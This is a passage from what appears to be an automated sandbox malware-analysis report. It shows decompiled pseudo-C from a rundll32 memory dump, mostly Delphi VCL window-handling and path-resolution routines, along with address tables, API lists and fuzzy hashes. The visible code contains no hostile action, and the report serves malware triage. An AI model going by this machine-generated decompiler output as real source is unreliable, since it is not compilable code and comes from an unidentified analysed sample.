                          								_t158 = _v12 + 8; // 0xfff025
                          								_t160 = _v12 + 4; // 0x4408bf8
                          								E0281E994(_v8,  *_t158,  *_t160);
                          								goto L102;
                          							} else {
                          								goto L101;
                          							}
                          						}
                          						if(__eflags == 0) {
                          							_t231 = _v8;
                          							__eflags =  *(_t231 + 0x44);
                          							if( *(_t231 + 0x44) != 0) {
                          								_v36 =  *((intOrPtr*)(_v8 + 0x44));
                          								_t235 = E02833F7C(_v36);
                          								__eflags = _t235;
                          								if(_t235 != 0) {
                          									_t238 = IsWindowEnabled(E02833F7C(_v36));
                          									__eflags = _t238;
                          									if(_t238 != 0) {
                          										_t241 = IsWindowVisible(E02833F7C(_v36));
                          										__eflags = _t241;
                          										if(_t241 != 0) {
                          											 *0x2863c8c = 0;
                          											_v20 = GetFocus();
                          											SetFocus(E02833F7C(_v36));
                          											_t131 = _v12 + 8; // 0xfff025
                          											_t133 = _v12 + 4; // 0x4408bf8
                          											E0282E93C(_v36,  *_t133, 0x112,  *_t131);
                          											SetFocus(_v20);
                          											 *0x2863c8c = 1;
                          											 *(_v12 + 0xc) = 1;
                          										}
                          									}
                          								}
                          							}
                          							goto L102;
                          						}
                          						__eflags = _t196 - 0xb000;
                          						if(__eflags > 0) {
                          							_t253 = _t196 - 0xb001;
                          							__eflags = _t253;
                          							if(_t253 == 0) {
                          								_t254 = _v8;
                          								__eflags =  *((short*)(_t254 + 0x10a));
                          								if( *((short*)(_t254 + 0x10a)) != 0) {
                          									 *((intOrPtr*)(_v8 + 0x108))();
                          								}
                          								goto L102;
                          							}
                          							__eflags = _t253 == 0x15;
                          							if(_t253 == 0x15) {
                          								_t259 = E0281E3FC(_v8, _v12);
                          								__eflags = _t259;
                          								if(_t259 != 0) {
                          									 *(_v12 + 0xc) = 1;
                          								}
                          								goto L102;
                          							} else {
                          								goto L101;
                          							}
                          						}
                          						if(__eflags == 0) {
                          							_t261 = _v8;
                          							__eflags =  *((short*)(_t261 + 0x112));
                          							if( *((short*)(_t261 + 0x112)) != 0) {
                          								 *((intOrPtr*)(_v8 + 0x110))();
                          							}
                          							goto L102;
                          						}
                          						_t264 = _t196 - 0x112;
                          						__eflags = _t264;
                          						if(_t264 == 0) {
                          							_t25 = _v12 + 4; // 0x4408bf8
                          							_t268 = ( *_t25 & 0x0000fff0) - 0xf020;
                          							__eflags = _t268;
                          							if(_t268 == 0) {
                          								E0281DF10(_v8);
                          							} else {
                          								__eflags = _t268 == 0x100;
                          								if(_t268 == 0x100) {
                          									E0281DFFC(_v8);
                          								} else {
                          									E0281D70C(_t403);
                          								}
                          							}
                          							goto L102;
                          						}
                          						_t276 = _t264 + 0xffffffe0 - 7;
                          						__eflags = _t276;
                          						if(_t276 < 0) {
                          							_t69 = _v12 + 8; // 0xfff025
                          							_t71 = _v12 + 4; // 0x4408bf8
                          							_t74 = _v12 + 8; // 0xfff025
                          							 *(_v12 + 0xc) = SendMessageA( *_t74,  *_v12 + 0xbc00,  *_t71,  *_t69);
                          							goto L102;
                          						}
                          						__eflags = _t276 == 0x1e1;
                          						if(_t276 == 0x1e1) {
                          							_t289 = E0280B168(E0280B088());
                          							__eflags = _t289;
                          							if(_t289 != 0) {
                          								E0280B1C4(E0280B088());
                          							}
                          							goto L102;
                          						} else {
                          							goto L101;
                          						}
                          					}
                          					if(__eflags == 0) {
                          						goto L89;
                          					}
                          					__eflags = _t196 - 0x16;
                          					if(__eflags > 0) {
                          						__eflags = _t196 - 0x1d;
                          						if(__eflags > 0) {
                          							_t292 = _t196 - 0x37;
                          							__eflags = _t292;
                          							if(_t292 == 0) {
                          								 *(_v12 + 0xc) = E0281DED8(_v8);
                          								goto L102;
                          							}
                          							__eflags = _t292 == 0x13;
                          							if(_t292 == 0x13) {
                          								_t82 = _v12 + 8; // 0xfff025
                          								__eflags =  *((intOrPtr*)( *_t82)) - 0xde534454;
                          								if( *((intOrPtr*)( *_t82)) == 0xde534454) {
                          									_t298 = _v8;
                          									__eflags =  *((char*)(_t298 + 0x9e));
                          									if( *((char*)(_t298 + 0x9e)) != 0) {
                          										_t299 = _v8;
                          										__eflags =  *(_t299 + 0xa0);
                          										if( *(_t299 + 0xa0) != 0) {
                          											 *(_v12 + 0xc) = 0;
                          										} else {
                          											 *(_v8 + 0xa0) = E027DD780("vcltest3.dll", _t351, 0x8000);
                          											_t303 = _v8;
                          											__eflags =  *(_t303 + 0xa0);
                          											if( *(_t303 + 0xa0) == 0) {
                          												 *(_v12 + 0xc) = GetLastError();
                          												 *(_v8 + 0xa0) = 0;
                          											} else {
                          												 *(_v12 + 0xc) = 0;
                          												_v28 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                          												__eflags = _v28;
                          												if(_v28 != 0) {
                          													_t98 = _v12 + 8; // 0xfff025
                          													_t101 = _v12 + 8; // 0xfff025
                          													_v28( *((intOrPtr*)( *_t101 + 4)),  *((intOrPtr*)( *_t98 + 8)));
                          												}
                          											}
                          										}
                          									}
                          								}
                          								goto L102;
                          							} else {
                          								goto L101;
                          							}
                          						}
                          						if(__eflags == 0) {
                          							_t317 =  *0x2865b5c; // 0x41d1150
                          							E0281C94C(_t317);
                          							E0281D70C(_t403);
                          							goto L102;
                          						}
                          						_t320 = _t196 - 0x1a;
                          						__eflags = _t320;
                          						if(_t320 == 0) {
                          							_t183 = _v12 + 4; // 0x4408bf8
                          							_t321 =  *0x286472c; // 0x2865b94
                          							E02838820( *_t321, _t354,  *_t183);
                          							E0281D68C(_v8, _t351, _v12);
                          							E0281D70C(_t403);
                          							goto L102;
                          						}
                          						__eflags = _t320 == 2;
                          						if(_t320 == 2) {
                          							E0281D70C(_t403);
                          							_pop(_t367);
                          							_t329 = _v12;
                          							__eflags =  *((intOrPtr*)(_t329 + 4)) - 1;
                          							asm("sbb eax, eax");
                          							 *((char*)(_v8 + 0x9d)) = _t329 + 1;
                          							_t331 = _v12;
                          							__eflags =  *(_t331 + 4);
                          							if( *(_t331 + 4) == 0) {
                          								E0281D508(_v8);
                          								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                          							} else {
                          								E0281D530(_v8, _t367);
                          								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                          							}
                          							goto L102;
                          						} else {
                          							goto L101;
                          						}
                          					}
                          					if(__eflags == 0) {
                          						_t342 = _v12;
                          						__eflags =  *(_t342 + 4);
                          						if( *(_t342 + 4) != 0) {
                          							 *((char*)(_v8 + 0x9c)) = 1;
                          						}
                          						goto L102;
                          					}
                          					__eflags = _t196 - 0x14;
                          					if(_t196 > 0x14) {
                          						goto L101;
                          					}
                          					switch( *((intOrPtr*)(_t196 * 4 +  &M0281D843))) {
                          						case 0:
                          							0 = E027F36B4(0, __ebx, __edi, __esi);
                          							goto L102;
                          						case 1:
                          							goto L101;
                          						case 2:
                          							_push(0);
                          							_push(0);
                          							_push(0xb01a);
                          							_v8 =  *(_v8 + 0x30);
                          							_push( *(_v8 + 0x30));
                          							L027D6D64();
                          							__eax = E0281D70C(__ebp);
                          							goto L102;
                          						case 3:
                          							__eax = _v12;
                          							__eflags =  *(__eax + 4);
                          							if( *(__eax + 4) == 0) {
                          								__eax = E0281D70C(__ebp);
                          								__eax = _v8;
                          								__eflags =  *(__eax + 0xac);
                          								if( *(__eax + 0xac) == 0) {
                          									__eax = _v8;
                          									__eax =  *(_v8 + 0x30);
                          									__eax = E0281331C( *(_v8 + 0x30), __ebx, __edi, __esi);
                          									__edx = _v8;
                          									 *(_v8 + 0xac) = __eax;
                          								}
                          								_v8 = E0281D51C(_v8);
                          							} else {
                          								_v8 = E0281D530(_v8, __ecx);
                          								__eax = _v8;
                          								__eflags =  *(__eax + 0xac);
                          								if( *(__eax + 0xac) != 0) {
                          									__eax = _v8;
                          									 *(_v8 + 0xac) = E028133D4( *(_v8 + 0xac));
                          									__eax = _v8;
                          									__edx = 0;
                          									__eflags = 0;
                          									 *(_v8 + 0xac) = 0;
                          								}
                          								__eax = E0281D70C(__ebp);
                          							}
                          							goto L102;
                          						case 4:
                          							__eax = _v8;
                          							__eax =  *(_v8 + 0x30);
                          							_push(__eax);
                          							L027D6CBC();
                          							__eflags = __eax;
                          							if(__eax == 0) {
                          								__eax = E0281D70C(__ebp);
                          							} else {
                          								__eax = E0281D748(__ebp);
                          							}
                          							goto L102;
                          						case 5:
                          							__eax = _v8;
                          							__eflags =  *(__eax + 0x44);
                          							if( *(__eax + 0x44) != 0) {
                          								__eax = _v8;
                          								 *((intOrPtr*)(_v8 + 0x44)) = E0281A330( *((intOrPtr*)(_v8 + 0x44)));
                          							}
                          							goto L102;
                          						case 6:
                          							__eax = _v12;
                          							 *_v12 = 0x27;
                          							__eax = E0281D70C(__ebp);
                          							goto L102;
                          					}
                          				} else {
                          					_v32 = _t192 + 1;
                          					_v16 = 0;
                          					do {
                          						_t347 = E027EB1E0( *((intOrPtr*)(_v8 + 0xa8)), _v16);
                          						_t351 = _t347;
                          						if( *_t347() != 0) {
                          							_pop(_t400);
                          							 *[fs:eax] = _t400;
                          							return 0;
                          						}
                          						_v16 = _v16 + 1;
                          						_t17 =  &_v32;
                          						 *_t17 = _v32 - 1;
                          						__eflags =  *_t17;
                          					} while ( *_t17 != 0);
                          					goto L5;
                          				}
                          			}























































                          0x0281de6f
                          0x00000000
                          0x0281d908
                          0x00000000
                          0x0281d908
                          0x0281d902
                          0x0281d822
                          0x00000000
                          0x00000000
                          0x0281d828
                          0x0281d82b
                          0x0281d897
                          0x0281d89a
                          0x0281d8b9
                          0x0281d8b9
                          0x0281d8bc
                          0x0281da0e
                          0x00000000
                          0x0281da0e
                          0x0281d8c2
                          0x0281d8c5
                          0x0281db63
                          0x0281db66
                          0x0281db6c
                          0x0281db72
                          0x0281db75
                          0x0281db7c
                          0x0281db82
                          0x0281db85
                          0x0281db8c
                          0x0281dc1b
                          0x0281db92
                          0x0281dba4
                          0x0281dbaa
                          0x0281dbad
                          0x0281dbb4
                          0x0281dc03
                          0x0281dc0b
                          0x0281dbb6
                          0x0281dbbb
                          0x0281dbd2
                          0x0281dbd5
                          0x0281dbd9
                          0x0281dbe2
                          0x0281dbec
                          0x0281dbf3
                          0x0281dbf3
                          0x0281dbd9
                          0x0281dbb4
                          0x0281db8c
                          0x0281db7c
                          0x00000000
                          0x0281d8cb
                          0x00000000
                          0x0281d8cb
                          0x0281d8c5
                          0x0281d89c
                          0x0281de49
                          0x0281de4e
                          0x0281de54
                          0x00000000
                          0x0281de59
                          0x0281d8a2
                          0x0281d8a2
                          0x0281d8a5
                          0x0281de26
                          0x0281de29
                          0x0281de30
                          0x0281de3b
                          0x0281de41
                          0x00000000
                          0x0281de46
                          0x0281d8ab
                          0x0281d8ae
                          0x0281da38
                          0x0281da3d
                          0x0281da3e
                          0x0281da41
                          0x0281da45
                          0x0281da4b
                          0x0281da51
                          0x0281da54
                          0x0281da58
                          0x0281da7f
                          0x0281da94
                          0x0281da5a
                          0x0281da5d
                          0x0281da72
                          0x0281da72
                          0x00000000
                          0x0281d8b4
                          0x00000000
                          0x0281d8b4
                          0x0281d8ae
                          0x0281d82d
                          0x0281db44
                          0x0281db47
                          0x0281db4b
                          0x0281db54
                          0x0281db54
                          0x00000000
                          0x0281db4b
                          0x0281d833
                          0x0281d836
                          0x00000000
                          0x00000000
                          0x0281d83c
                          0x00000000
                          0x0281de78
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0281da16
                          0x0281da18
                          0x0281da1a
                          0x0281da22
                          0x0281da25
                          0x0281da26
                          0x0281da2c
                          0x00000000
                          0x00000000
                          0x0281da9e
                          0x0281daa1
                          0x0281daa5
                          0x0281dae1
                          0x0281dae7
                          0x0281daea
                          0x0281daf1
                          0x0281daf3
                          0x0281daf6
                          0x0281daf9
                          0x0281dafe
                          0x0281db01
                          0x0281db01
                          0x0281db0a
                          0x0281daa7
                          0x0281daaa
                          0x0281daaf
                          0x0281dab2
                          0x0281dab9
                          0x0281dabb
                          0x0281dac4
                          0x0281dac9
                          0x0281dacc
                          0x0281dacc
                          0x0281dace
                          0x0281dace
                          0x0281dad5
                          0x0281dada
                          0x00000000
                          0x00000000
                          0x0281d9c6
                          0x0281d9c9
                          0x0281d9cc
                          0x0281d9cd
                          0x0281d9d2
                          0x0281d9d4
                          0x0281d9e3
                          0x0281d9d6
                          0x0281d9d7
                          0x0281d9dc
                          0x00000000
                          0x00000000
                          0x0281d9a9
                          0x0281d9ac
                          0x0281d9b0
                          0x0281d9b6
                          0x0281d9bc
                          0x0281d9bc
                          0x00000000
                          0x00000000
                          0x0281d9ee
                          0x0281d9f1
                          0x0281d9f8
                          0x00000000
                          0x00000000
                          0x0281d7ca
                          0x0281d7cb
                          0x0281d7ce
                          0x0281d7d5
                          0x0281d7e1
                          0x0281d7e6
                          0x0281d7f2
                          0x0281d7f6
                          0x0281d7f9
                          0x00000000
                          0x0281d7f9
                          0x0281d801
                          0x0281d804
                          0x0281d804
                          0x0281d804
                          0x0281d804
                          0x00000000
                          0x0281d7d5

                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID: RegisterAutomation$vcltest3.dll
                          • API String ID: 0-2963190186
                          • Opcode ID: cbe372e846a04b4d0fd0cb2d7336ff16442ab37c6a2c9571c6ffd14533c9b6ae
                          • Instruction ID: 28b9f812897f5ccfb253bf1ceb4790fb35ac5c61d737903e20a8e3de271be0b6
                          • Opcode Fuzzy Hash: cbe372e846a04b4d0fd0cb2d7336ff16442ab37c6a2c9571c6ffd14533c9b6ae
                          • Instruction Fuzzy Hash: 12F1E57DA00208DFDB14DBA8C588B9DBBFAAF58315F5481A4E409DB2A5D734EE80CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E027D55A4(char* __eax, intOrPtr __edx) {
                          				char* _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				struct _WIN32_FIND_DATAA _v334;
                          				char _v595;
                          				void* _t45;
                          				char* _t54;
                          				char* _t64;
                          				void* _t83;
                          				intOrPtr* _t84;
                          				char* _t90;
                          				struct HINSTANCE__* _t91;
                          				char* _t93;
                          				void* _t94;
                          				char* _t95;
                          				void* _t96;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v16 = _v8;
                          				_t91 = GetModuleHandleA("kernel32.dll");
                          				if(_t91 == 0) {
                          					L4:
                          					if( *_v8 != 0x5c) {
                          						_t93 = _v8 + 2;
                          						goto L10;
                          					} else {
                          						if( *((char*)(_v8 + 1)) == 0x5c) {
                          							_t95 = E027D5590(_v8 + 2);
                          							if( *_t95 != 0) {
                          								_t14 = _t95 + 1; // 0x1
                          								_t93 = E027D5590(_t14);
                          								if( *_t93 != 0) {
                          									L10:
                          									_t83 = _t93 - _v8;
                          									_push(_t83 + 1);
                          									_push(_v8);
                          									_push( &_v595);
                          									L027D1354();
                          									while( *_t93 != 0) {
                          										_t90 = E027D5590(_t93 + 1);
                          										_t45 = _t90 - _t93;
                          										if(_t45 + _t83 + 1 <= 0x105) {
                          											_push(_t45 + 1);
                          											_push(_t93);
                          											_push( &(( &_v595)[_t83]));
                          											L027D1354();
                          											_t94 = FindFirstFileA( &_v595,  &_v334);
                          											if(_t94 != 0xffffffff) {
                          												FindClose(_t94);
                          												_t54 =  &(_v334.cFileName);
                          												_push(_t54);
                          												L027D135C();
                          												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                          													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                          													_push(0x105 - _t83 - 1);
                          													_push( &(_v334.cFileName));
                          													_push( &(( &(( &_v595)[_t83]))[1]));
                          													L027D1354();
                          													_t64 =  &(_v334.cFileName);
                          													_push(_t64);
                          													L027D135C();
                          													_t83 = _t83 + _t64 + 1;
                          													_t93 = _t90;
                          													continue;
                          												}
                          											}
                          										}
                          										goto L17;
                          									}
                          									_push(_v12);
                          									_push( &_v595);
                          									_push(_v8);
                          									L027D1354();
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                          					if(_t84 == 0) {
                          						goto L4;
                          					} else {
                          						_push(0x105);
                          						_push( &_v595);
                          						_push(_v8);
                          						if( *_t84() == 0) {
                          							goto L4;
                          						} else {
                          							_push(_v12);
                          							_push( &_v595);
                          							_push(_v8);
                          							L027D1354();
                          						}
                          					}
                          				}
                          				L17:
                          				return _v16;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D55C1
                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 027D55D2
                          • lstrcpyn.KERNEL32(?,?,?,?,027D5804,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D5602
                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 027D5666
                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861,?,80000001), ref: 027D569B
                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000,027D5861), ref: 027D56AE
                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804,00000000), ref: 027D56BB
                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,00001205,028630A4,?,027D5804), ref: 027D56C7
                          • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 027D56FB
                          • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 027D5707
                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 027D5729
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                          • String ID: GetLongPathNameA$\$kernel32.dll
                          • API String ID: 3245196872-1565342463
                          • Opcode ID: 81edd164401b5fadad99022b0bb126b6eef2ea93b5c11444752cde4356df83df
                          • Instruction ID: cbb1e34470ac83970b6e975c0d9a92e961d0fb5136742f7482eaac8d8b37c75e
                          • Opcode Fuzzy Hash: 81edd164401b5fadad99022b0bb126b6eef2ea93b5c11444752cde4356df83df
                          • Instruction Fuzzy Hash: F6418076A00219ABEB21DAA8CC88ADEB7FEDF48714F9401B1E949E7141E7349E448F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E02819BD8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				long _v12;
                          				long _v16;
                          				struct HWND__* _v20;
                          				long _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				intOrPtr _t193;
                          				intOrPtr _t199;
                          				intOrPtr _t200;
                          				intOrPtr _t205;
                          				intOrPtr _t207;
                          				intOrPtr _t208;
                          				void* _t211;
                          				struct HWND__* _t212;
                          				long _t223;
                          				intOrPtr _t240;
                          				signed int _t242;
                          				signed int _t243;
                          				intOrPtr _t244;
                          				signed int _t246;
                          				signed int _t247;
                          				long _t272;
                          				intOrPtr _t278;
                          				int _t283;
                          				intOrPtr _t284;
                          				intOrPtr _t295;
                          				signed int _t298;
                          				signed int _t299;
                          				intOrPtr _t300;
                          				signed int _t303;
                          				signed int _t304;
                          				intOrPtr _t306;
                          				intOrPtr _t310;
                          				intOrPtr _t311;
                          				intOrPtr _t312;
                          				signed int _t314;
                          				signed int _t315;
                          				intOrPtr _t316;
                          				signed int _t318;
                          				signed int _t319;
                          				intOrPtr _t328;
                          				signed int _t331;
                          				signed int _t332;
                          				intOrPtr _t333;
                          				signed int _t336;
                          				signed int _t337;
                          				intOrPtr _t338;
                          				intOrPtr _t340;
                          				intOrPtr _t341;
                          				signed int _t343;
                          				signed int _t344;
                          				intOrPtr _t345;
                          				signed int _t347;
                          				signed int _t348;
                          				intOrPtr _t355;
                          				signed int _t362;
                          				signed int _t363;
                          				signed int _t367;
                          				signed int _t368;
                          				long _t372;
                          				intOrPtr _t377;
                          				long _t393;
                          				long _t395;
                          				intOrPtr _t398;
                          				intOrPtr _t399;
                          				intOrPtr _t401;
                          				long _t404;
                          				long _t417;
                          				intOrPtr _t422;
                          				void* _t430;
                          				void* _t431;
                          				intOrPtr _t432;
                          
                          				_t430 = _t431;
                          				_t432 = _t431 + 0xffffffe4;
                          				_v32 = 0;
                          				_v28 = __edx;
                          				_v8 = __eax;
                          				_push(_t430);
                          				_push(0x281a1a4);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t432;
                          				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                          					_t377 =  *0x2864784; // 0x27f53fc
                          					E027D6018(_t377,  &_v32);
                          					E027DBBC4(_v32, 1);
                          					E027D3A9C();
                          				}
                          				_t193 =  *0x2865b58; // 0x41d1544
                          				E0281F100(_t193);
                          				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                          				_push(_t430);
                          				_push(0x281a187);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t432;
                          				if(( *(_v8 + 0x1c) & 0x00000010) != 0) {
                          					L83:
                          					_pop(_t398);
                          					 *[fs:eax] = _t398;
                          					_push(0x281a18e);
                          					_t199 = _v8;
                          					 *(_t199 + 0x2f4) =  *(_t199 + 0x2f4) & 0x000000fb;
                          					return _t199;
                          				}
                          				_t200 = _v8;
                          				_t436 =  *((char*)(_t200 + 0x1a6));
                          				if( *((char*)(_t200 + 0x1a6)) == 0) {
                          					_push(_t430);
                          					_push(0x281a085);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t432;
                          					E027D3408(_v8, __eflags);
                          					_pop(_t399);
                          					 *[fs:eax] = _t399;
                          					_t205 =  *0x2865b5c; // 0x41d1150
                          					_t167 = _t205 + 0x6c; // 0x0
                          					__eflags =  *_t167 - _v8;
                          					if( *_t167 == _v8) {
                          						__eflags = 0;
                          						E02818964(_v8, 0);
                          					}
                          					_t207 = _v8;
                          					__eflags =  *((char*)(_t207 + 0x22f)) - 1;
                          					if( *((char*)(_t207 + 0x22f)) != 1) {
                          						_t208 = _v8;
                          						__eflags =  *(_t208 + 0x2f4) & 0x00000008;
                          						if(( *(_t208 + 0x2f4) & 0x00000008) == 0) {
                          							_v20 = 0;
                          							_t211 = E02833F7C(_v8);
                          							_t212 = GetActiveWindow();
                          							__eflags = _t211 - _t212;
                          							if(_t211 == _t212) {
                          								_t223 = IsIconic(E02833F7C(_v8));
                          								__eflags = _t223;
                          								if(_t223 == 0) {
                          									_v20 = E028134A0(E02833F7C(_v8));
                          								}
                          							}
                          							__eflags = _v20;
                          							if(_v20 == 0) {
                          								ShowWindow(E02833F7C(_v8), 0);
                          							} else {
                          								SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 0x97);
                          								SetActiveWindow(_v20);
                          							}
                          						} else {
                          							SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 0x97);
                          						}
                          					} else {
                          						E028314D4(_v8);
                          					}
                          					goto L83;
                          				}
                          				_push(_t430);
                          				_push(0x2819c93);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t432;
                          				E027D3408(_v8, _t436);
                          				_pop(_t401);
                          				 *[fs:eax] = _t401;
                          				if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                          					if( *((char*)(_v8 + 0x22f)) != 1) {
                          						_t240 =  *0x2865b5c; // 0x41d1150
                          						_t242 = E0281B960(_t240) -  *(_v8 + 0x48);
                          						__eflags = _t242;
                          						_t243 = _t242 >> 1;
                          						if(_t242 < 0) {
                          							asm("adc eax, 0x0");
                          						}
                          						_v12 = _t243;
                          						_t244 =  *0x2865b5c; // 0x41d1150
                          						_t246 = E0281B940(_t244) -  *(_v8 + 0x4c);
                          						__eflags = _t246;
                          						_t247 = _t246 >> 1;
                          						if(_t246 < 0) {
                          							asm("adc eax, 0x0");
                          						}
                          						_v16 = _t247;
                          						goto L20;
                          					} else {
                          						_t295 =  *0x2865b58; // 0x41d1544
                          						_t32 = _t295 + 0x44; // 0x0
                          						_t298 = E0282D154( *_t32) -  *(_v8 + 0x48);
                          						_t299 = _t298 >> 1;
                          						if(_t298 < 0) {
                          							asm("adc eax, 0x0");
                          						}
                          						_v12 = _t299;
                          						_t300 =  *0x2865b58; // 0x41d1544
                          						_t36 = _t300 + 0x44; // 0x0
                          						_t303 = E0282D198( *_t36) -  *(_v8 + 0x4c);
                          						_t304 = _t303 >> 1;
                          						if(_t303 < 0) {
                          							asm("adc eax, 0x0");
                          						}
                          						_v16 = _t304;
                          						L20:
                          						if(_v12 < 0) {
                          							_v12 = 0;
                          						}
                          						if(_v16 < 0) {
                          							_v16 = 0;
                          						}
                          						_t393 = _v16;
                          						_t404 = _v12;
                          						 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                          						if( *((char*)(_v8 + 0x57)) != 0) {
                          							E02817918(_v8, _t393, _t404);
                          						}
                          						goto L64;
                          					}
                          				} else {
                          					_t306 = _v8;
                          					__eflags =  *((intOrPtr*)(_t306 + 0x230)) + 0xfa - 2;
                          					if( *((intOrPtr*)(_t306 + 0x230)) + 0xfa - 2 >= 0) {
                          						_t310 = _v8;
                          						__eflags =  *((char*)(_t310 + 0x230)) - 5;
                          						if( *((char*)(_t310 + 0x230)) == 5) {
                          							_t311 = _v8;
                          							__eflags =  *((char*)(_t311 + 0x22f)) - 1;
                          							if( *((char*)(_t311 + 0x22f)) != 1) {
                          								_t312 =  *0x2865b5c; // 0x41d1150
                          								_t314 = E0281B9E0(_t312) -  *(_v8 + 0x48);
                          								__eflags = _t314;
                          								_t315 = _t314 >> 1;
                          								if(_t314 < 0) {
                          									asm("adc eax, 0x0");
                          								}
                          								_v12 = _t315;
                          								_t316 =  *0x2865b5c; // 0x41d1150
                          								_t318 = E0281B9C0(_t316) -  *(_v8 + 0x4c);
                          								__eflags = _t318;
                          								_t319 = _t318 >> 1;
                          								if(_t318 < 0) {
                          									asm("adc eax, 0x0");
                          								}
                          								_v16 = _t319;
                          							} else {
                          								_t328 =  *0x2865b58; // 0x41d1544
                          								_t112 = _t328 + 0x44; // 0x0
                          								_t331 = E0282D154( *_t112) -  *(_v8 + 0x48);
                          								__eflags = _t331;
                          								_t332 = _t331 >> 1;
                          								if(_t331 < 0) {
                          									asm("adc eax, 0x0");
                          								}
                          								_v12 = _t332;
                          								_t333 =  *0x2865b58; // 0x41d1544
                          								_t116 = _t333 + 0x44; // 0x0
                          								_t336 = E0282D198( *_t116) -  *(_v8 + 0x4c);
                          								__eflags = _t336;
                          								_t337 = _t336 >> 1;
                          								if(_t336 < 0) {
                          									asm("adc eax, 0x0");
                          								}
                          								_v16 = _t337;
                          							}
                          							__eflags = _v12;
                          							if(_v12 < 0) {
                          								__eflags = 0;
                          								_v12 = 0;
                          							}
                          							__eflags = _v16;
                          							if(_v16 < 0) {
                          								__eflags = 0;
                          								_v16 = 0;
                          							}
                          							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                          						}
                          					} else {
                          						_t338 =  *0x2865b58; // 0x41d1544
                          						_t63 = _t338 + 0x44; // 0x0
                          						_v24 =  *_t63;
                          						_t340 = _v8;
                          						__eflags =  *((char*)(_t340 + 0x230)) - 7;
                          						if( *((char*)(_t340 + 0x230)) == 7) {
                          							_t422 =  *0x2811d48; // 0x2811d94
                          							_t372 = E027D3398( *((intOrPtr*)(_v8 + 4)), _t422);
                          							__eflags = _t372;
                          							if(_t372 != 0) {
                          								_v24 =  *((intOrPtr*)(_v8 + 4));
                          							}
                          						}
                          						__eflags = _v24;
                          						if(_v24 == 0) {
                          							_t341 =  *0x2865b5c; // 0x41d1150
                          							_t343 = E0281B960(_t341) -  *(_v8 + 0x48);
                          							__eflags = _t343;
                          							_t344 = _t343 >> 1;
                          							if(_t343 < 0) {
                          								asm("adc eax, 0x0");
                          							}
                          							_v12 = _t344;
                          							_t345 =  *0x2865b5c; // 0x41d1150
                          							_t347 = E0281B940(_t345) -  *(_v8 + 0x4c);
                          							__eflags = _t347;
                          							_t348 = _t347 >> 1;
                          							if(_t347 < 0) {
                          								asm("adc eax, 0x0");
